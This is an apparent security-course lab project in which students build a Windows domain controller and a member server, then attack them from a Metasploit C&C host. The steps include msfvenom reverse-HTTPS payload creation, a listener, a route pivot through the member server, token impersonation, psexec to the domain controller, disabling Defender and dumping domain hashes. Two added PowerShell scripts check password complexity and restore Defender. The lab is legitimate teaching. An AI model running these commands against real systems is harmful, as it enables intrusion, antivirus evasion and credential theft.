ED 312: Exploiting a Windows Domain (30 pts)

What You Need for this Project

Purpose

To prepare an environment like that used in real enterprises, appropriate for security projects.

Task 1: Making a Domain Controller

Making a Windows 2016 Server

Create a cloud server, as shown below.

From the Google Cloud Console, set the password for your domain controller. Connect to it via RDP.

Adding the "Active Directory Domain Services" Role

In "Server Manager", make these selections:

A progress bar moves across the window. When it finishes, it shows a gray message near the top saying "Configuration required". Click Close.

Promoting the Server

At the top right of the Server Manager window, click the yellow triangle.

Click "Promote this server to a domain controller", as shown below.

In the "Active Directory Domain Services Configuration Wizard", make these selections:

A red bar appears, saying "One or more prerequisites failed...". In the lower right, the problem is explained: the administrator password does not meet requirements, as shown below.

Assigning an Administrator Password

At the lower left of the desktop, right-click the Start button. Click "Command Prompt (Admin)". In the User Account Control box, click Yes.

In the Administrator Command Prompt window, execute this command:

net user administrator P@ssw0rd123
(You may prefer to choose a more secure password.)

Close the Administrator Command Prompt window.

In the "Active Directory Domain Services Configuration Wizard", on the "Prerequisites Check" page, at the top center, in small blue type, click "Rerun prerequisites check".

Now the check passes, as shown below.
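The prerequisites check above fails because the local Administrator password does not meet the complexity rules the new domain will enforce. The following PowerShell function is an added example (not part of the original project) that approximates those rules, so a candidate password can be checked before promotion: the Default Domain Policy minimum length of 7, the "three of four character categories" rule, and the account-name check. It ignores the full-name token check and the extra Unicode category that Windows also evaluates.

```powershell
# Added example: approximate the Windows "Password must meet complexity
# requirements" policy and the Default Domain Policy minimum length of 7.
function Test-PasswordComplexity {
    param(
        [Parameter(Mandatory)] [string]$Password,
        [string]$AccountName = 'Administrator',
        [int]$MinimumLength = 7   # Default Domain Policy value (local policy default is 0)
    )
    $failures = @()
    if ($Password.Length -lt $MinimumLength) {
        $failures += "shorter than $MinimumLength characters"
    }
    # Windows skips the account-name check when the name is under 3 characters.
    if ($AccountName.Length -ge 3 -and
        $Password.IndexOf($AccountName, [StringComparison]::OrdinalIgnoreCase) -ge 0) {
        $failures += "contains the account name '$AccountName'"
    }
    # Character categories: at least three of the four are required.
    $categories = 0
    if ($Password -cmatch '[A-Z]')        { $categories++ }
    if ($Password -cmatch '[a-z]')        { $categories++ }
    if ($Password -match  '[0-9]')        { $categories++ }
    if ($Password -match  '[^A-Za-z0-9]') { $categories++ }
    if ($categories -lt 3) {
        $failures += "uses only $categories of 4 character categories (needs 3)"
    }
    [pscustomobject]@{
        Password = $Password
        Passes   = ($failures.Count -eq 0)
        Failures = ($failures -join '; ')
    }
}

# Constructed sample passwords, including the one used in this project.
'P@ssw0rd123', 'password', 'Administrator1!', 'Ab1!' | ForEach-Object {
    Test-PasswordComplexity -Password $_
} | Format-Table -AutoSize
```

Run it in any PowerShell window; only 'P@ssw0rd123' passes, the others fail on length, categories, or the account-name rule.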

Click Install.

The server installs software and restarts.

Logging In

Connect again via RDP.

Log in with these credentials:

The login process takes several minutes, waiting for the Group Policy Client.

Finding the Domain Controller's IP Address

On your Domain Controller, open a Command Prompt and execute the ipconfig command.

Find your IP address. Make a note of it--you will need it later. When I did it, my IP address was 10.138.0.3.


Task 2: Making a Member Server

Create another Windows cloud server, the same way you created the Domain Controller.

Adjusting the DNS Server

At the lower left of the desktop, right-click the Start button. Click "Network Connections".

In the "Network Connections" window, right-click Ethernet and click Properties.

In the Ethernet Properties box, double-click "Internet Protocol Version 4 (TCP/IPv4)".

In the Internet Protocol Version 4 (TCP/IPv4) Properties window, in the lower section, click the "Use the following DNS server addresses" button.

Enter the IP address of your domain controller, as shown below.

Note: your IP address will be different from my example.

Click OK.

Click OK.

Open a Command Prompt and execute this command:

ping hackme.com
You should get replies, as shown below.

Joining the Domain

At the lower left of the desktop, right-click the Start button. Click System.

In the System window, on the left side, click "Advanced system settings".

A System Properties box opens.

In System Properties, click the "Computer Name" tab.

Click the Change... button.

In the "Computer Name/Domain Changes" box, click the Domain button and enter a Domain of HACKME.COM as shown below.

Click OK.

A Windows Security box pops up. Enter these credentials:

A box pops up saying "Welcome to the HACKME.COM domain". Click OK.

A box pops up saying "You must restart your machine...". Click OK.

Close all windows and restart your Member Server.

Logging In to the Domain

Connect again to the Member Server via RDP.

Log in with these credentials:

ED 312.1: Recording your Success (15 pts)

In a Command Prompt window, execute this command:
whoami /all
The flag is covered by a green box in the image below.


Task 3: Making the Member Server Vulnerable

Turning off IE Enhanced Security

On the Member Server, in Server Manager, at the top, click "1 Configure this Local Server".

On the right side, set "IE Enhanced Security Configuration" to Off, as shown below.

Turning off Windows Defender Real-Time Protection

Open an Administrator PowerShell window and execute this command:
Set-MpPreference -DisableRealtimeMonitoring $true
At the lower left of the desktop, click the magnifying-glass icon. Search for DEF and click "Windows Defender".

Real-time protection should be off, as shown below.


Task 4: Preparing a C&C Server

Launch your Debian cloud attacker, which should already have Metasploit installed.

Creating Malware with Msfvenom

In Linux, execute these commands to create a malicious Windows executable file named "happy.exe" and serve it from a malicious Web server. It's an executable designed to run as a service.

Adjust the IP address to match the IP address of your Linux machine (the C&C server), which the first command shows you.

ip a
sudo apt install apache2 -y
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.142.0.3 -f exe -o /var/www/html/happy.exe
sudo service apache2 start

Starting a Listener

In Linux, execute these commands to listen for incoming connections from compromised targets:
sudo msfconsole -q
use multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 0.0.0.0
exploit
Metasploit opens a handler, as shown below.


Task 4: Exploiting the Member Server

On the Windows member server, open Internet Explorer and go to this URL, replacing the IP address with the IP address of your Linux C&C server.
http://10.142.0.3/happy.exe
Click Run. IE pops up a box saying "happy.exe is not commonly downloaded and might harm your computer".

Click Actions. Click "More options". Click "Run anyway".

On your Linux C&C server, a meterpreter session opens, as shown below.

At the "meterpreter >" prompt, execute these commands to see who you are and escalate to SYSTEM, as shown below.

(In this case, we were already the Domain Admin, but usually you are a mere domain user, and you need to escalate to System, and then get Domain Admin, so we'll practice that process.)

getuid
getsystem
getuid


Task 5: Pivoting to the Domain Controller

Configuring a Route on the Member Server

On Kali, in the Meterpreter session controlling the Member Server, execute this command:
background
That places the session in the background.

On Kali, in msfconsole, execute these commands:

use post/multi/manage/autoroute
show info
Information appears about the module, as shown below.

On Kali, in msfconsole, execute these commands. Replace the IP address with the IP address of the network containing your Domain Controller.

set SESSION 1
set CMD add
set SUBNET 10.138.0.0
exploit
The module runs, adding a route to the subnet, as shown below.

On Kali, execute these commands to see the routing table.

set CMD print
exploit
The routing table now sends traffic to the subnet through session 1, as shown below.

Scanning the Domain Controller

On Kali, execute these commands to see how Metasploit's port scanner works.
use auxiliary/scanner/portscan/tcp
show info
The parameters are explained, as shown below.

On Kali, execute these commands to scan TCP ports 139 and 445 on the Domain Controller.

Replace the IP address with the IP address of your Domain Controller.

set PORTS 139,445
set RHOSTS 10.138.0.3
exploit
The ports are open, because we are pivoting through the Member Server, as shown below.

Exploitation Options

To exploit the domain controller, we could use ETERNALROMANCE again, or pass the hash, but for this project we'll use token theft, just to practice it.

Enumerating Tokens

On Kali, execute these commands to see the privilege tokens available on the Member Server.
sessions -i 1
use incognito
list_tokens -u
A "Delegation Token" is available for "HACKME\Administrator", the Domain Admin, as shown below.

Escalating Privileges to Domain Admin

On Kali, in the Meterpreter session, execute these commands.
impersonate_token HACKME\\Administrator
getuid
You are now a domain administrator, as shown below.

Exploiting the Domain Controller

In Metasploit, execute these commands.
background
use exploit/windows/local/current_user_psexec
show info
This exploit lets us run code on the domain controller using the token, without a need for a password or hash, as shown below.

At the meterpreter prompt, execute these commands. Use the IP address of your Domain Controller and the session number of your Domain Admin session.

set RHOSTS 10.138.0.3
set SESSION 1
exploit
The session fails, as shown below.

Observing Windows Defender History

To see why, on the Domain Controller, in an RDP session, open Windows Defender.

Look in the History and you can see that the attack was blocked, as shown below.

Turning off Windows Defender Real-Time Protection

On the Domain Controller, open an Administrator PowerShell window and execute this command:
Set-MpPreference -DisableRealtimeMonitoring $true
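Both the Member Server step in Task 3 and this step on the Domain Controller switch off the protection that blocked the psexec attempt. The following PowerShell is an added example (not part of the original project) for the cleanup and review side of the lab: it reports Defender's real-time protection state, re-enables it, and pulls the same detection history the Windows Defender GUI shows from the Defender operational event log.

```powershell
# Added example: audit and restore Defender real-time protection on a lab
# server, and list the recent detection events behind the GUI "History" view.
function Get-DefenderState {
    $status = Get-MpComputerStatus
    $pref   = Get-MpPreference
    [pscustomobject]@{
        Computer                  = $env:COMPUTERNAME
        RealTimeProtectionEnabled = $status.RealTimeProtectionEnabled
        DisableRealtimeMonitoring = $pref.DisableRealtimeMonitoring
        SignatureAgeDays          = $status.AntivirusSignatureAge
    }
}

function Enable-RealTimeProtection {
    # Reverses the Set-MpPreference -DisableRealtimeMonitoring $true used in the lab.
    Set-MpPreference -DisableRealtimeMonitoring $false
    Get-DefenderState
}

function Get-RecentDefenderEvents {
    param([int]$Hours = 24)
    # 5001 = real-time protection disabled, 1116 = malware detected, 1117 = action taken.
    Get-WinEvent -FilterHashtable @{
        LogName   = 'Microsoft-Windows-Windows Defender/Operational'
        Id        = 5001, 1116, 1117
        StartTime = (Get-Date).AddHours(-$Hours)
    } -ErrorAction SilentlyContinue |
        Select-Object TimeCreated, Id,
            @{ n = 'Summary'; e = { ($_.Message -split "`n")[0] } }
}

# Run from an Administrator PowerShell window on the server being checked.
$state = Get-DefenderState
$state | Format-List
if (-not $state.RealTimeProtectionEnabled) {
    Write-Warning "Real-time protection is OFF on $($state.Computer); re-enabling."
    Enable-RealTimeProtection | Format-List
}
Get-RecentDefenderEvents | Format-Table -AutoSize
```

Run it after finishing the project to confirm that both servers are back to a protected state and to see the blocked psexec attempt in the event list.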

Exploiting the Domain Controller Again

In Metasploit, execute this command:
exploit
Now the session opens, as shown below.

Dumping Domain Hashes

In Metasploit, execute these commands.
background
use post/windows/gather/smart_hashdump
show info
This post module dumps domain hashes, as shown below.

ED 312.2: Recording your Success (15 pts)

In Metasploit, execute these commands. Use the session number of your Domain Controller session.
set GETSYSTEM true
set SESSION 1
exploit
Hashes appear.

The flag is covered by a green box in the image below.


Posted 4-30-19